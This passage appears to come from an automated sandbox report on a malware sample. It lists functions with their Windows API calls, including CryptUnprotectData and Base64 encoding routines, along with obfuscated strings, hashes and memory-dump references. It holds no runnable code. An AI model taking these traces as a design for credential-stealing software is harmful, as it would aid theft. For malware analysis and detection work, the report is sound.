                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 992f3bdf30a58a2e52e107aaf589cb872ec6bb9bd1e8cad5dba678eb3c336674
                                • Instruction ID: 07b3f72b2ebed840b2d12c6b105b9480e96a1adb4381cf171d48ff1e2e02f4f8
                                • Opcode Fuzzy Hash: 992f3bdf30a58a2e52e107aaf589cb872ec6bb9bd1e8cad5dba678eb3c336674
                                • Instruction Fuzzy Hash: 2C31F575F00219ABDB209B58EC49FEEB77DEF84715F008165FA09F3240D7B15A048BA2
                                Function 00E640B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 00E640CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 00E640DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E640E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00E64113
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: ea510bdb2714e87815ddc9bb806e67d9cee6f4068756e9b43072b78e3b435012
                                • Instruction ID: b6b8cb17399bb85885cfca67a0f84aa3e4eec3338ab27417dd1e674fe690618d
                                • Opcode Fuzzy Hash: ea510bdb2714e87815ddc9bb806e67d9cee6f4068756e9b43072b78e3b435012
                                • Instruction Fuzzy Hash: 76015EB0600205ABDB208FA5EC49F6A7BADEF45325F108459BE4897240DA729940CB91
                                Function 00E62B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,00E6A3D0,000000FF), ref: 00E62B8F
                                • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00E62B96
                                • GetLocalTime.KERNEL32(?,?,00000000,00E6A3D0,000000FF), ref: 00E62BA2
                                • wsprintfA.USER32 ref: 00E62BCE
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateLocalProcessTimewsprintf
                                • String ID:
                                • API String ID: 377395780-0
                                • Opcode ID: 926ec8e7f78fdeb9a87c0071e72ef07bc5fc5f1cc1f33e1cc76a1fe662bc2b59
                                • Instruction ID: 27eb8f62a42c28c7f2c4ae5f702d193ef7085f901464bfa8c96f6c93ccc00269
                                • Opcode Fuzzy Hash: 926ec8e7f78fdeb9a87c0071e72ef07bc5fc5f1cc1f33e1cc76a1fe662bc2b59
                                • Instruction Fuzzy Hash: BF012DB2D54128ABCB249BC99D49FBEB7BCFB4CB21F00411AF645A2280E77D5440C7B1
                                Function 00E49B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                                Download Yara Rule
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E49B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E49B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00E49B61
                                • LocalFree.KERNEL32 ref: 00E49B70
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 60eb5349fa01372cacd3513eedfcd28c60dd5697a774bf4043a143e2da33f58e
                                • Instruction ID: 0f3ca642f2299244d9e1e880c11620c99ffb269cc12c1b1504ee483a72ec1eac
                                • Opcode Fuzzy Hash: 60eb5349fa01372cacd3513eedfcd28c60dd5697a774bf4043a143e2da33f58e
                                • Instruction Fuzzy Hash: 84F01D70750312ABE7311F64BC49F577BA8EF04B64F200154FA45FA2C4E7B59850CBA4
                                Function 00E5CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.COMBASE(00E6B110,00000000,00000001,00E6B100,?), ref: 00E5CB06
                                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 00E5CB46
                                • lstrcpyn.KERNEL32(?,?,00000104), ref: 00E5CBC9
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                                • String ID:
                                • API String ID: 1940255200-0
                                • Opcode ID: 3375ca2d99e00f6380ca8337163ad6783f975e306dee15ea8bab6d0e7d8110ad
                                • Instruction ID: d6490525ae383cbd737fb309c603444b893b36473e7b655a74919baaf013e71c
                                • Opcode Fuzzy Hash: 3375ca2d99e00f6380ca8337163ad6783f975e306dee15ea8bab6d0e7d8110ad
                                • Instruction Fuzzy Hash: 1F318471A40315BFD710DB94CC96FAAB7B99B88B11F104584FA04EB2D0D7B1AE44CB90
                                Function 00E49B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00E49B9F
                                • LocalAlloc.KERNEL32(00000040,?), ref: 00E49BB3
                                • LocalFree.KERNEL32(?), ref: 00E49BD7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: a9ed099a285b492ef1eca773c2781c105987bb8174e160f4e95d5f2add72dee9
                                • Instruction ID: c53d6c644b69005c123ff830206c15cfdf72da24a0679078696cacf8fde84a76
                                • Opcode Fuzzy Hash: a9ed099a285b492ef1eca773c2781c105987bb8174e160f4e95d5f2add72dee9
                                • Instruction Fuzzy Hash: 40016DB5E41309ABD7109BA4DC49FAFB778EB44B00F104254FA00BB285D7B59E00CBE4
                                Function 01202B2C Relevance: 3.6, Strings: 2, Instructions: 1090COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 'l?o$isw~
                                • API String ID: 0-3545199178
                                • Opcode ID: 76a4d84ef2178ee8a73e69d648002b9da5067b7c3f00506792bc6dcd2f0caf87
                                • Instruction ID: 50bd68cbcd0ac3d421f22114c17c73e5bb808c8320b683166bedda107e82b847
                                • Opcode Fuzzy Hash: 76a4d84ef2178ee8a73e69d648002b9da5067b7c3f00506792bc6dcd2f0caf87
                                • Instruction Fuzzy Hash: 0E7219F3608204AFE304AE2DEC8577BFBE9EF94620F1A453DEAC5C3744E53598018696
                                Function 0117877A Relevance: 2.7, Strings: 2, Instructions: 222COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _}$_}
                                • API String ID: 0-2228023342
                                • Opcode ID: 5f09ae21cca51a11d863d21bb6476f817202b680737173b7b3e89fe73e4b7a31
                                • Instruction ID: 7feebed3acf8cc82d7bb0fb13186c39a034da793e854be7ace721061a8c587bd
                                • Opcode Fuzzy Hash: 5f09ae21cca51a11d863d21bb6476f817202b680737173b7b3e89fe73e4b7a31
                                • Instruction Fuzzy Hash: E35129F3E182185FE348593DDC85376B6CAE7D4320F2A823DAE44E7788EC7A5D054195
                                Function 01168AE9 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: t>$xPIz
                                • API String ID: 0-123843675
                                • Opcode ID: c7216f71dc93dafce258c2607a8faf42629a45c331863bd423bc0a4568d7bf64
                                • Instruction ID: 3814509501e80d8149de8f292d709b31eab9b62f73f43216265973ca1d0b652d
                                • Opcode Fuzzy Hash: c7216f71dc93dafce258c2607a8faf42629a45c331863bd423bc0a4568d7bf64
                                • Instruction Fuzzy Hash: 8C6156B3A186044FE748AE3DEC1533AB7DAEF90310F25863DE5C2C7784EA7998058346
                                Function 011300F7 Relevance: 1.5, Strings: 1, Instructions: 230COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tQa}
                                • API String ID: 0-4197841719
                                • Opcode ID: a439e549bc61bc5a1fe26b706eeeba8f6ebaff1bc2d0c8fb72fb6e9a47172106
                                • Instruction ID: 400d7901c485b0dbd675c78e88e9928e10c65cfd366deee3940f2e297a23600a
                                • Opcode Fuzzy Hash: a439e549bc61bc5a1fe26b706eeeba8f6ebaff1bc2d0c8fb72fb6e9a47172106
                                • Instruction Fuzzy Hash: 9C6138F3D082245BF3106A19DC457B6BAD5DB94720F1A863DEEC8A7780E9795C0582C6
                                Function 011DBA50 Relevance: 1.4, Strings: 1, Instructions: 175COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: [_
                                • API String ID: 0-3476257853
                                • Opcode ID: 4ccf661f07eb9fe06468ae3ce112160bdd167de5cc1831a017f2f09e5073fc36
                                • Instruction ID: 21bf62ae3faea9762c1a491823fb1b6807491a7d839b27fe41036616faaaa0ce
                                • Opcode Fuzzy Hash: 4ccf661f07eb9fe06468ae3ce112160bdd167de5cc1831a017f2f09e5073fc36
                                • Instruction Fuzzy Hash: 0C5122F3B096004BF3486A29ECA43B676C6EB94320F2B853DD7C8877C4ED7D58454286
                                Function 010F4D90 Relevance: .2, Instructions: 204COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
